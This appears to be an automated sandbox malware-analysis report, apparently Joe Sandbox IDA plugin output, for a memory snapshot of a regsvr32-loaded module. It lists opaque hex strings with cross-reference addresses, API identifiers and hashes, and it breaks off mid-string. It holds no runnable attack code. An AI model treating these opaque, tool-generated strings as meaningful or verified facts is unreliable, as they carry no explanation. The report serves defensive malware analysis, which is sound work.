                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFolderPath
                                                                                                                • String ID: 41352f26a97e153f7b3157b47315edb36e$413faf131f631510223b17d4e6d08629356fb8dfb3fe87f2a4eb993fa918eea291805f3e445432$953ad5a4eaadc5eeaab641851c8abde0c69320f06da1169d6b988a5b34d10a9e572e945dda18b3$b90143b2e7b6f83ad1667e2233be5779eab4a572f237b9f11347
                                                                                                                • API String ID: 4036707352-3052264634
                                                                                                                • Opcode ID: 26eec701310069ce8dcd72723181a107c6a4ba78c39c625106ed3ab7e7920267
                                                                                                                • Instruction ID: db2649fd3b571b31a344eb5a3c34bf0303409044538828f1ced06df1d9720de6
                                                                                                                • Opcode Fuzzy Hash: 26eec701310069ce8dcd72723181a107c6a4ba78c39c625106ed3ab7e7920267
                                                                                                                • Instruction Fuzzy Hash: 5E12C8A2B14B8195EF00DBA5D444B9D2322FB447A8F845239E66E57ADDDFBCF188C340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • cf90336a761150b3802e1f31358cd1918b7e212e2c585d9c701d63316c8511ee55b7fdc0, xrefs: 00007FF983D2072E
                                                                                                                • 8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450, xrefs: 00007FF983D1D8BE
                                                                                                                • 1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69, xrefs: 00007FF983D1DF57
                                                                                                                • 35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b, xrefs: 00007FF983D1E90D
                                                                                                                • 6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda, xrefs: 00007FF983D1F328
                                                                                                                • e0d92630ea5ab7e9169067535c436f1ba418520799a644dfa57670407452780d99326d1c, xrefs: 00007FF983D20B98
                                                                                                                • c3afe3583507f43898d5f76303035c188b50c7ef9ff6660cf155d7d1a1d6cb, xrefs: 00007FF983D20C7A
                                                                                                                • 194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07, xrefs: 00007FF983D1E89C
                                                                                                                • ca35339a90c6667b02b95fba2d26f3158ddd9a54a10a1c375499ae43, xrefs: 00007FF983D1C587
                                                                                                                • e4f024b0f588a0906eb3fc55ae76938ab70f6cb938f639c5cf1997925d5fa46f, xrefs: 00007FF983D1F9AF
                                                                                                                • f5788632833a499e00af6570eb281151b3a24a1cc89bbc4629f1d5, xrefs: 00007FF983D1ECFA
                                                                                                                • b120fd8c4181662b994a1f36bc714a73f9ad24d8ca2e2669a28de3a0797b4573badb, xrefs: 00007FF983D20B27
                                                                                                                • 51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5, xrefs: 00007FF983D1E350
                                                                                                                • bf1903b8d5fd63ef8b417979e962dab0f884f304b32422ae5147, xrefs: 00007FF983D1F3FE
                                                                                                                • a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd, xrefs: 00007FF983D1CBEF
                                                                                                                • e1d532db7c6dd3445eb4439561fda38fa61650c6d5dc7a526995b74c49d81ed0, xrefs: 00007FF983D1DA82
                                                                                                                • 10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861, xrefs: 00007FF983D1E3C1
                                                                                                                • 66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201, xrefs: 00007FF983D208F2
                                                                                                                • 95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4, xrefs: 00007FF983D1D6FA
                                                                                                                • 8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f, xrefs: 00007FF983D1DEE6
                                                                                                                • f1660a456733745a1791021663c647e5b2a6c9edfea891bedd295312, xrefs: 00007FF983D1CE7F
                                                                                                                • c92e521f87ac24ff436835e1e8612bf29bd0e5a94b93e17f504d1db92909, xrefs: 00007FF983D1FEEF
                                                                                                                • dfdc4db9ab76b794a162ede3efe2737d973f06cf3724fd0dfef965f379e8efd770fb, xrefs: 00007FF983D206BD
                                                                                                                • 8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e, xrefs: 00007FF983D1D257
                                                                                                                • a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653, xrefs: 00007FF983D1F6A4
                                                                                                                • c009125dec75eea8bce4346a30ddf95695ce90890a08884c9f1a4a742bb0201abfe1, xrefs: 00007FF983D20F14
                                                                                                                • ae70ab793522704fa7436c63fc906f4bedf229295a110d27c1, xrefs: 00007FF983D1D76B
                                                                                                                • 2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b, xrefs: 00007FF983D1E039
                                                                                                                • 16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874, xrefs: 00007FF983D20124
                                                                                                                • 13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07, xrefs: 00007FF983D20DCD
                                                                                                                • 90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277, xrefs: 00007FF983D20042
                                                                                                                • 980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1, xrefs: 00007FF983D20195
                                                                                                                • 326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d, xrefs: 00007FF983D204F9
                                                                                                                • 6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f, xrefs: 00007FF983D1ED6B
                                                                                                                • a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a, xrefs: 00007FF983D1FF60
                                                                                                                • f992f1205b6fcce93ceb623c698f7b12be49ccbb898820a6ed7553061df7ef891fff7700, xrefs: 00007FF983D1D536
                                                                                                                • ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335, xrefs: 00007FF983D1DE75
                                                                                                                • 6d079b4125d59aa358b2f5904df97d742f41aeade445, xrefs: 00007FF983D1F4E0
                                                                                                                • 2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214, xrefs: 00007FF983D20A45
                                                                                                                • 9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9, xrefs: 00007FF983D1BF1F
                                                                                                                • 475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923, xrefs: 00007FF983D1E2DF
                                                                                                                • d315fa9fc315aa9dda68ee749f45228c94e46ab41367bd54ebf16c51a083ce, xrefs: 00007FF983D203B2
                                                                                                                • 1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7, xrefs: 00007FF983D1FC49
                                                                                                                • 23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c, xrefs: 00007FF983D2064C
                                                                                                                • 8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6, xrefs: 00007FF983D1EB42
                                                                                                                • ba56732586fb83df10df36c2c1c23d3de8dbcfa95dc3218aff6b388307bdc1, xrefs: 00007FF983D1FE7E
                                                                                                                • 277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23, xrefs: 00007FF983D1E749
                                                                                                                • 26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f, xrefs: 00007FF983D1DB64
                                                                                                                • 6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34, xrefs: 00007FF983D1F164
                                                                                                                • 0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7, xrefs: 00007FF983D20CEB
                                                                                                                • 6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153, xrefs: 00007FF983D1F011
                                                                                                                • 3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0, xrefs: 00007FF983D1F399
                                                                                                                • 58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461, xrefs: 00007FF983D202DC
                                                                                                                • f8cf18dd257b3c5994c79aa0f88dba1abe186ed7b1a6f5df2e, xrefs: 00007FF983D1E9EF
                                                                                                                • 9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33, xrefs: 00007FF983D20206
                                                                                                                • d736c92c5a303cbef4a63cad9585506b98de72303a782bf667b2fd, xrefs: 00007FF983D1DE04
                                                                                                                • 06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5, xrefs: 00007FF983D1F0F3
                                                                                                                • 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9, xrefs: 00007FF983D1E26E
                                                                                                                • 91a82fffab8959a91a27732300a81773d61b40ef25dee2254b, xrefs: 00007FF983D1F082
                                                                                                                • f92111aee3dd3eb249b4b6c99da63ac0befa9f7eff4813c2ff0a, xrefs: 00007FF983D1F46F
                                                                                                                • 19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0, xrefs: 00007FF983D1CD37
                                                                                                                • c21bde90e48282e9161e20daa9367e2e84f646b210fb0b91f3abe25498ef, xrefs: 00007FF983D1DBCF
                                                                                                                • 5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2, xrefs: 00007FF983D1E7BA
                                                                                                                • 60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c, xrefs: 00007FF983D1F633
                                                                                                                • f23225cf1370a957296663bfb53054b1a2f1a007524b8ebcd0cec408c98a89, xrefs: 00007FF983D2026B
                                                                                                                • a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac, xrefs: 00007FF983D1D618
                                                                                                                • c52efbf68579ec032cd130e47aacf55789c852c0091997e6ab0841f2, xrefs: 00007FF983D1C067
                                                                                                                • 784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635, xrefs: 00007FF983D1F2B7
                                                                                                                • 68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03, xrefs: 00007FF983D1FB67
                                                                                                                • 8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207, xrefs: 00007FF983D1E6D8
                                                                                                                • b869dee166604c7dd136156f7162c305ebca53d7c5e3c0d16437506f7f69c290, xrefs: 00007FF983D1F8CD
                                                                                                                • c442d929b46725d62b32b0a6280ef60f83a40964b5a1ef4d094bac63254fd6ae, xrefs: 00007FF983D1EEBE
                                                                                                                • d9c026900582effe1ebd7cc94fdb8afbaa0241bdd465b86812c3d3, xrefs: 00007FF983D1F868
                                                                                                                • d8cc16f26f32c667e8d27907236797fb8d1349ffffba12199e2d30632f0ef067da57, xrefs: 00007FF983D20F81
                                                                                                                • bf9e295aed52287f64d377289bdaf2d5f70c446ec2fcb8a8af, xrefs: 00007FF983D1E4A3
                                                                                                                • 0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997, xrefs: 00007FF983D1E432
                                                                                                                • 44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230, xrefs: 00007FF983D1DAF3
                                                                                                                • 75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c, xrefs: 00007FF983D1DC40
                                                                                                                • af6d4d98b684a445cca353a6da190bf7fcd9d73dee0bdbfb73b9985be28feb6eb890a56a, xrefs: 00007FF983D1F93E
                                                                                                                • 6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84, xrefs: 00007FF983D1C2F7
                                                                                                                • 4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc, xrefs: 00007FF983D1D84D
                                                                                                                • 8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3, xrefs: 00007FF983D1D7DC
                                                                                                                • 91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a, xrefs: 00007FF983D1E1FD
                                                                                                                • 8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123, xrefs: 00007FF983D1DCB1
                                                                                                                • 27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7, xrefs: 00007FF983D1DFC8
                                                                                                                • 74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb, xrefs: 00007FF983D1E11B
                                                                                                                • ae451e306fd5880b0b283c8d85a7edf1f8d4b8fce652b6fc9bdf8c62, xrefs: 00007FF983D1E82B
                                                                                                                • f9007b3c51c4eb71e936ba5887ccef7baae2da94a0059a8e237cb4896dd5555cdc999ae7, xrefs: 00007FF983D1FA20
                                                                                                                • a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849, xrefs: 00007FF983D1C817
                                                                                                                • cbcfa9c911c58c51f737695511215bb3823dfc59389c605881d2d7ee, xrefs: 00007FF983D2034D
                                                                                                                • 931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112, xrefs: 00007FF983D20AB6
                                                                                                                • 7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e, xrefs: 00007FF983D20963
                                                                                                                • d3f56f5ee2844541bfa7ff17bffdb2a994041f078a7c5c7ab77ff58c57fd26e156ccd4, xrefs: 00007FF983D1EF2F
                                                                                                                • a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529, xrefs: 00007FF983D1FD9C
                                                                                                                • 9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a, xrefs: 00007FF983D20EAF
                                                                                                                • e87ee75d200430eb580caaeb80adad2aafb4272c691f5cdee98b, xrefs: 00007FF983D1EAD1
                                                                                                                • cc728c2004b83a708c5273fd44bf7b8e9c9c7f3c5d96df9c223e28ad9d, xrefs: 00007FF983D1D9A0
                                                                                                                • 10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204, xrefs: 00007FF983D209D4
                                                                                                                • 85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334, xrefs: 00007FF983D1C6CF
                                                                                                                • d9cd3e33aaa2d19c56f72ee1550d26c89e367c18db17a25170d39506365a18802b89d4825b8a12ea, xrefs: 00007FF983D1F1D5
                                                                                                                • d45827653ff249726a79fdbede60cf2697bdfffbb0272833352983, xrefs: 00007FF983D1C95F
                                                                                                                • d4f019a4bc1b04ce85451244cdc3825586136d8a443a5fe5050b7c41c972a7, xrefs: 00007FF983D1FBD8
                                                                                                                • 68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046, xrefs: 00007FF983D1FFD1
                                                                                                                • 9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904, xrefs: 00007FF983D1F715
                                                                                                                • d7dddef40bcb161fd3eb8d8a7486578f833b970e6cc9bed563d827c2d53612ee, xrefs: 00007FF983D1EA60
                                                                                                                • 54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2, xrefs: 00007FF983D1D4C5
                                                                                                                • 5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12, xrefs: 00007FF983D2079F
                                                                                                                • 6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642, xrefs: 00007FF983D1EDDC
                                                                                                                • 2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3, xrefs: 00007FF983D1FD2B
                                                                                                                • ed4393d9cfcf648c68a8462e5d12462fa59275dc42f8f90716f7df97a5e0, xrefs: 00007FF983D205DB
                                                                                                                • 94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b, xrefs: 00007FF983D1C43F
                                                                                                                • ca56dc2ee2b0c3d7a05c5ae07ef9c1de8dbe1673f43d9c24e5cbf5464cd461da, xrefs: 00007FF983D1EFA0
                                                                                                                • 66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f, xrefs: 00007FF983D1FCBA
                                                                                                                • d29f33018596af56885209a0391cf43d81722440b5, xrefs: 00007FF983D1E667
                                                                                                                • 3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b, xrefs: 00007FF983D20C09
                                                                                                                • 65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148, xrefs: 00007FF983D1F5C2
                                                                                                                • 2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488, xrefs: 00007FF983D20D5C
                                                                                                                • eceff0f615e1c4fb66078a687301ac07ab21a50777fb4ff2fd96795f4d21e8ae, xrefs: 00007FF983D1D689
                                                                                                                • 23652a638c61b35ff5c0d664f45b77e574632037def9231080, xrefs: 00007FF983D1E18C
                                                                                                                • 5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a, xrefs: 00007FF983D2056A
                                                                                                                • 6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b, xrefs: 00007FF983D20423
                                                                                                                • 0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371, xrefs: 00007FF983D1D10F
                                                                                                                • bb46ffb0aca3bd917252d1c742e13147f8cc56875f99679986a414a78c0f527089a62df03dee, xrefs: 00007FF983D1F551
                                                                                                                • b04a73b91d80aa63421bef90fb578aa4f4dbc418719478725c229a, xrefs: 00007FF983D1CAA7
                                                                                                                • a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32, xrefs: 00007FF983D1E97E
                                                                                                                • 80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f, xrefs: 00007FF983D1D39F
                                                                                                                • bf81c4339c0567778e1845a6fa806f77f81cacd12c5d5352b9f2ce1b9570724c9d7ad1, xrefs: 00007FF983D1E5F6
                                                                                                                • ec3c4702515cd356c277cc1a46f21024abf2c18eb0882e14b38c215577e99cef, xrefs: 00007FF983D1CFC7
                                                                                                                • dd169041e6045ea695d4b5fba5755d3b9ae90d0a85edd623df71a1, xrefs: 00007FF983D1E0AA
                                                                                                                • 93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb, xrefs: 00007FF983D1FAF6
                                                                                                                • bf51a99cdb967bf6a1d913652f34a12defcc0af54baea663f06f15025e1e, xrefs: 00007FF983D1D92F
                                                                                                                • bfbd7ac29b17425c42fe685407a963e1f936298e592707290a8697, xrefs: 00007FF983D1DD93
                                                                                                                • bab48db1066544d59deb3233c5a06e22f329d004707b5afb31a8f3b414f2f5bb64, xrefs: 00007FF983D20E3E
                                                                                                                • c14f175733a8f3afce34d618e4699e4488a9caf8b97fe932affe5c0b9f82755ef1fb9494, xrefs: 00007FF983D20881
                                                                                                                • dd862964aa8aca24afcf7450037a2cd58e6d2829e01e9bdd18b2a581, xrefs: 00007FF983D1F7F7
                                                                                                                • 6f46400e097576c089e1826b85a329f52906284205151baf60e80608da, xrefs: 00007FF983D1D454
                                                                                                                • ff37083708963434836f8f0c252e8680adff9bc9a0451464a4, xrefs: 00007FF983D1F246
                                                                                                                • b5d89de6a671b8e58f278d4b431bbeeef24fa617d8c71b91693df4d6e79944de04ae4aed, xrefs: 00007FF983D1DD22
                                                                                                                • fc56483f3e7d781d805ab9ebfb49a29cbb88b4cfb2, xrefs: 00007FF983D1EE4D
                                                                                                                • 8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751, xrefs: 00007FF983D20488
                                                                                                                • fca149785f396367b46459231b7c6df2b4615c544e191e2bfaefc385ede5df, xrefs: 00007FF983D20810
                                                                                                                • adbb1de09138566ae13bf6a34ef0e33dea345de917447773db8e1ed2ee73f1b87ca8db, xrefs: 00007FF983D200B3
                                                                                                                • 27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f, xrefs: 00007FF983D1C1AF
                                                                                                                • 7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f, xrefs: 00007FF983D1EBA7
                                                                                                                • a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa, xrefs: 00007FF983D1E514
                                                                                                                • 360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91, xrefs: 00007FF983D1D5A7
                                                                                                                • b1e575e0f56b59ae6fb4053a0134145ef07172f376741e82c3137a2c, xrefs: 00007FF983D1FA91
                                                                                                                • 6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18, xrefs: 00007FF983D1BDD8
                                                                                                                • 99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff, xrefs: 00007FF983D1EC89
                                                                                                                • ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace, xrefs: 00007FF983D1EC18
                                                                                                                • 594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560, xrefs: 00007FF983D1E585
                                                                                                                • 7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07, xrefs: 00007FF983D1DA11
                                                                                                                • 1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78, xrefs: 00007FF983D1F786
                                                                                                                • ed45e0772b1e6a7ce3d97cf2cbb14418bf9f183e601b0306b30b1b9c32c6faa3, xrefs: 00007FF983D1FE0D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000013.00000002.526881955.00007FF983D01000.00000040.00020000.sdmp, Offset: 00007FF983D00000, based on PE: true
                                                                                                                • Associated: 00000013.00000002.526868191.00007FF983D00000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527206038.00007FF983D74000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527230547.00007FF983D7D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527244840.00007FF983D7E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 00000013.00000002.527295746.00007FF983D80000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_19_2_7ff983d00000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$_invalid_parameter_noinfo_noreturn$LibraryLoad$ByteCharMultiWide$ExitProcess
                                                                                                                • String ID: 022a590d2d2a261c2ff43f11893052504107314f076522501b83d9$06d3733131e648cf28720bc7a05aabf141f7f092da4f73d99ca3cd7eac9f57d5$0a6b4b18fb316b6ccd54060af723a5004d437c37b8e8f1e951753a5ecf8371$0a8f72b7210cc93bd6890e2f17b76aae42a8bb7c1b65c997$0c3875e657e18cea4a4743b7f5c047da45131291b43bd24c557740b83d89a712700d00a7$10cac4a3326a442915df4e8306c93e4d57f848bbfbfed995f35f59bfd861$10ea9417b1e5eca3ebcd47ea70f91f6758c62641bf2aa36ed77f49d6c3492204$13da3ce74a6ecdeee44fc2e702edfa3b5aeea6241c1cb42e89aa0793f451ca9fe85e07$16a2d2d8afb6955ad5291461e8545f52598b3c8a75b14b72c298ffca4d724874$194ad6e2463647b9be0b2e4d7c26a6f14f6cc85e6d3a11ee224c07$19d5b245ac951bc00d224db747a1619849ee3315dc3a52a19ef2da1526d0$1a6a127f9e04974b54a6ee30e44a747f5d52340fd89e605f78$1c13803fdaf8353c9c9359d5ae32cc454e38dfb30c80e3be4ea89404d2b7$1e33beaa587030c02c47d930b6d9b9585d1cc70c203551f9a7853d69$2061ba6256efb6891eecb1a8a2f3ef076c62b7be9d02e41f68f22aee29bd3766272ae5e2e3$23107da82c414ec26013f2d64c7334056a141dd08ea18a3c1f63ff476e7e3e6c$23652a638c61b35ff5c0d664f45b77e574632037def9231080$26cbf04a4868128ae27692fa3f400af569d24763667b1df2685f$277b548ff70fc3f99d349e0f18f3763a607e5e820c70c75babcb3c5e23$27809bba4d35951c83c4ffc99b43c363649668b38ada1d648a21aa06c9e2535513f7$27bdeb72ca4adbdce35c2d8d09c434dd60b82718bd933d8d0b1155b4d85207b7f51f$2b1c7dcc3a269ac1ceeb3f2e01377d19621019b0f8b04ffa66e8b6fcbbe5f488$2bd67717abdd51e5bb5239279142d2677ccbd5b65be9ca7cae92cc87737ecec38d383b$2e54efd0785843876af16fa51ee73b5b6646dd7d54795faab90100c3b214$326a084d7628bdbc97b8c826c5a440fd7a641825004d9e46835ee7b414c3f75d$35afa16f90a328c897dd203b3c7bf6cf63a5766d884a0e9673c195cb949b$360cfd519b97e544812269d269f5645c7118918d798a1a32d6b2b20c00bbbe8fdc91$3afade5ea96645d0cb395edcfd991f3a7de35439a2eacb77d0$3bce7b3e49fbd6ee4e71c7864d7c09d073c9c688801fad113a3a886b555d1ca9f359470b318b$44e07755013ffac525bbf9f2ccc1531303868583f6a82091c10aba268c2230$475464bad40fb48e809a5fb0f7e726c0042223f85832d233dc2a1dc853c4d123370d08c26502d923$4b0b66734236dacb0dbd0f1fa927e9f4087172605605993b5a82cc$51d1ab1f973b22ad171de9114b27ad0a16a27d36c890d9374f27a0c5$54aedfe200a2e70b95878acadc33f7d313d873c7a866f49262ac48e457168c3e1ed969e5b2$58074166796bb64cc10d838fbf20c48e086e5b556a68b29b1f6a807cb7e461$594c15ed3d0f9ff0999324d0235430351e3756f7a5c937ab669cd560$5a814cfbaeb81e87bc8a6772ad2aced212e7df54bb671dc811eaf8ef316fe95e6580a920fd12$5c8e6cba98791bb246a40313f165e04a14eef63cebe29c405495e7811503978a$5fc1cfa2f72c018b070f8174a41c8c851caf05c6450c5dbfc8a2$60f9bec216d00726e2eb331997ac34de24b86acdaf1a593c$6419b63e2652735e7612d56c96193ce2295590dd9aafb9a5bcd642$65da0a4293a43bc418b649a6ce0d7936268ee1c225e49c374284ac7ed9b6a3f0d148$66384b63830f06dd89d9d6dc2813ba253469456284e7842dc14ef94914628f$66f36046464d7ebfb22dfee5b266c15b2fb2a685b1928942bfe279f201$68e3946f496577446d0811362ba750c93abc4f714d4d48754e275a1957b59d03$68e3e048d7ba3ccdeaee5651d4ec733224a82704a66c00bf3ca49ba6179c8aeee768fdd046$6aa0bf16a73a4e6ea6ca1360de0eb9923ef10f6aaefdda$6adae71efed0775d74b4cafe393cd05f2981037cf643644b508728a5ef84$6c4134218acfdbeeaed3ffe0abb7a81b2b0f4f3ec666de71bb0c8104dc18$6cc7a01ef6b434925547b47afaf526923b955b2cb4652599a8835b$6d079b4125d59aa358b2f5904df97d742f41aeade445$6dc1e696bfe71e78ac8508393e9d66f82a8e1cdd0b82f8ef34$6e9d6abda563597e5562f718bbef9a6729d1cf39f9e3e9e3d7c153$6f46400e097576c089e1826b85a329f52906284205151baf60e80608da$6f97f1348aedd0519f2bd6b0a4d4642f28da5f3cdf5ce8d63e41f23aea7f$74a14e1cbac65f5beb1ddf413f8ad0b126e2cdb549e6d5eb$75795f2a2fec19bf9e7f917114a194ce3323125c3db4d51ec6d02d396c$784fadad03d79961f5d491a70ae6ea522b0cce1440fe090c9635$7a3506fdc2c3f933d1a65269d19684b4397e1d8137912563c6052f07$7acc638be5eb9cd3c8d95f7d29affd383c99947bc94bb90ea9070f$7bdf7829949fa5099c95d5760809de3d339894cd0af03b569868cccfa2d8720e$80ebe56c42434189c0ba73a70ecaeaf3c644cfc7c3e9da20946872b9d24f$8248be407b4f2370d3c434278f7d41efd1e02d190725524bf554347cb5a18c06d0f12207$8598e1d592fd856d79aba497a0b293c3ca22a61dc24abbb3b24e$85dc60a65d009ab880ff90517ca5706ac67565baa1c83ee334$8a154c878361e80767350518452912dfcebe9e7c8b8f214f441450$8add899fac99b955f890785f2daa75b1c7758a709a6abf8f32dae3$8b84e55763d57f3015dec1a0e67258accc2dbcbdb108025f2fb817d158586da05fb2380123$8c76136e982d69548c2b8bbb9127a810c5ddbab15b181434f7ac429751$8d46c7d496e1e218f9001141c009116bd8ed4fe94c9f532fbad6$8de56a5c0dcbbf74487691107cc39fdcda4d4e660e955843687b99facb6d9f2cd34f$90e4e54d02c03b7b04b0cc3cc4a1a7a3c243c1cfa10e465817c277$91a82fffab8959a91a27732300a81773d61b40ef25dee2254b$91c4401fe131385d4e2abe925cce858dc263570e86db868baae939dfe65a$931fa7d5eeaaa4b85a7d0633dd488592daab78c85490519d8496fea31b30c112$93735d3d3632064f4051343953130094c1d7ed9fd98ee6e2c7ef9edfdb$9406d30f477d17be06d9b063a198a652d8b10368637702cea902cbe9$9471e86b7bbcf2b6e7d521338e6098b6d3c75b746aa03bee6cfabaf904$94d6f7f4c934be13639cab6eb2e02876d360e343efb6782d27d71939ea672a0b$95a43bfef3821f41def3d4c0b088041ed2135cf6608fe0f14ec975f4$980b94e883b7771cc422064567daadc2d9b648d525e6c5b6195e362336855ef5016f9c11e1$99f2f392ab7904b41d9251c4cdd1201bd443c322e8f6976113f9ff$9bc85aef3b6da834978cb9f6dbb0007aee5462e0b4b731619a7a$9f0e02e9cb065cd45ab6d29a2e82d74aec8ae47ad0a69369578d33$a1ac343ab94ffd8b46ef83824d313b40f33a691cd5ff6cac8f19df2529$a246aef866f9432cd611cf00f25a54bae5c61ca7b43f0e47ff9a0577ead3e22bfa$a3c3e12838d058220ec7c6432ae298eaee42d598e65f6b2c67d849$a57c927096ad23810290f94b0650cd41f7ee1b2fdc1d5baec90f97b0c3f67a$a5efba161c4e2ee9d74c4b7de835b92df568bdc8b18cd10beee4c6c95213fd$a73c13507c528524702e97c156d4d65be3bac5f0f8cf05435912e653$a8c7f21f54680b3577fe942aa792c17eeb5ec9b7979ac1869e03f2ab7fac$a93fa231bff82bba3cac1a089047ec2aecab6025ca4004dd845b32$ac94aea45c890165b38ff49514ce1d70fa07db0b22caa7835cbf24d28335$ada61c8cc4d4ca79462a045e53833d69ea29419a378d2335047a1b3d1ace$adbb1de0913